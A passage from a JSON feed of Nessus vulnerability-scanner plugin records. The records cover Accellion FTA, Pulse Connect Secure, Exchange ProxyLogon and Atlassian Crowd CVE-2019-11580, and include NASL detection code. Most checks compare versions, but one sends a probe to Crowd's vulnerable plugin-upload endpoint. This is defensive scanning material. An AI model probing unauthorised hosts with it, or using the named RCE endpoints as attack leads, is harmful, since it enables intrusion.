script_dependencies(\"accellion_file_transfer_appliance_unsupported.nasl\");\n script_require_keys(\"installed_sw/Accellion Secure File Transfer Appliance\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp_name = 'Accellion Secure File Transfer Appliance';\n\nif (!get_install_count(app_name:app_name))\n audit(AUDIT_NOT_DETECT, app_name);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:443);\n\nreport = 'The remote host is running Accellion File Transfer Appliance (FTA) that is End of Life (EOL) on Apr 30th 2021.\\n' +\n 'It is recommended by Accellion that all customers upgrade to a more secure platform, kiteworks that is currently supported.\\n\\n' + \n 'Otherwise, update to Accellion FTA version 9_12_416 or later.';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:12:04", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than 9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R11.4 (SA44784)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44784.NASL", "href": "https://www.tenable.com/plugins/nessus/148847", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148847);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-22893\",\n \"CVE-2021-22894\",\n \"CVE-2021-22899\",\n \"CVE-2021-22900\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0207-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R11.4 (SA44784)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than\n9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass\nvulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect\nSecure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22894\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22893\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/\n# 9.1R11.3 is 9.1.11.12173\n# 9.1R11.4 is 9.1.11.12319\nconstraints = [\n {'min_version':'9.0.3', 'max_version':'9.1.11.12173', 'fixed_display':'9.1R11.4 (9.1.11.12319)'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:10:14", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been targeted in the Hafnium campaign. It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for .aspx files that could potentially indicate compromise.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-08T00:00:00", "type": "nessus", "title": "Potential exposure to Hafnium Microsoft Exchange targeting", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "HAFNIUM_IOC_DETECT.NBIN", "href": "https://www.tenable.com/plugins/nessus/147193", "sourceData": "Binary data hafnium_ioc_detect.nbin", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:55:14", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-03T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-04-04T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "href": "https://www.tenable.com/plugins/nessus/147003", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147003);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/04\");\n\n script_cve_id(\n \"CVE-2021-26412\",\n \"CVE-2021-26854\",\n \"CVE-2021-26855\",\n \"CVE-2021-26857\",\n \"CVE-2021-26858\",\n \"CVE-2021-27065\",\n \"CVE-2021-27078\"\n );\n script_xref(name:\"MSKB\", value:\"5000871\");\n script_xref(name:\"MSFT\", value:\"MS21-5000871\");\n script_xref(name:\"IAVA\", value:\"2021-A-0111-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/16\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854,\n CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065,\n CVE-2021-27078)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14b26c05\");\n # https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fedb98e4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5000871\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26855\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyLogon RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.12',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 16,\n 'min_version': '15.01.1979.0',\n 'fixed_version': '15.01.1979.8',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 18,\n 'min_version': '15.01.2106.0',\n 'fixed_version': '15.01.2106.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 19,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.9',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': '15.02.529.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 5,\n 'min_version': '15.02.595.0',\n 'fixed_version': '15.02.595.8',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 6,\n 'min_version': '15.02.659.0',\n 'fixed_version': '15.02.659.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 7,\n 'min_version': '15.02.721.0',\n 'fixed_version': '15.02.721.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.10',\n 'kb': '5000871'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98658", "href": "https://www.tenable.com/plugins/was/98658", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:36", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98660", "href": "https://www.tenable.com/plugins/was/98660", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98656", "href": "https://www.tenable.com/plugins/was/98656", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98659", "href": "https://www.tenable.com/plugins/was/98659", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98657", "href": "https://www.tenable.com/plugins/was/98657", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:21:16", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-22T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "701078.PRM", "href": "https://www.tenable.com/plugins/nnm/701078", "sourceData": "Binary data 701078.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:37:47", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_CVE-2019-11580.NASL", "href": "https://www.tenable.com/plugins/nessus/138553", "sourceData": "#TRUSTED 8f52b3443adbdc031337caca6a3f34431f1b341d3c8301cf3e855f7f3363fbf0bf9b7f0d58e3328a37d6dece24c4c9dcc73ccf78c27c66d987dbdaf6186643afcfe8dbbc2a0517f9fa9531f0240b05a4751809b449e7dc3066482ae086e25a8f94806188dd42bd8ab78dda28cd63fada8492a35233a18a0929ee865082646260d7509392ad29c59b136b7ce199b50c9b7bcfd6458681e82364f52769b833c14183c063bfcf2ba969406b456addd06a58c41686d4c22ae421eea1298aa494c5dfa1ed98dd838ec86de8cc085782289be07f9c3eca1aa874f02206fe704079a7488502da717dcb6223d5b571ad82a45452823e72986ed6a0581d646c30d1d53de860ee91ddd19597a98583110f32b85345b2c36163508b0ccee993f8919c893d2d9e79690bed760d1572886b9e870ec31650c8cbfc554058b352c177810529591eb45f6d9a9d0c1ae0d00d20abe798b9809d0ca28b76a78c63a1bb316535270ee0d30a8efb58ee8a33560d87ee2120ade6e00838d2bead85bb289646fa07933c19f1ef493bb3eb0002b72f80b1a0b67aef6bd2be04668761d49be8c98d3f8fbfff92b0b56f028087c9e4d08fedad1efa53ca16080353f0be83d9346be201249ffeb2db1d808bc47055cce92b6574b049eeda084c90cf42d51403e4c9491d22eb322b7339937ad22dce432806931ddb73d6073e66e35ed7578ed43065921e1ca2bb\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T13:14:27", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 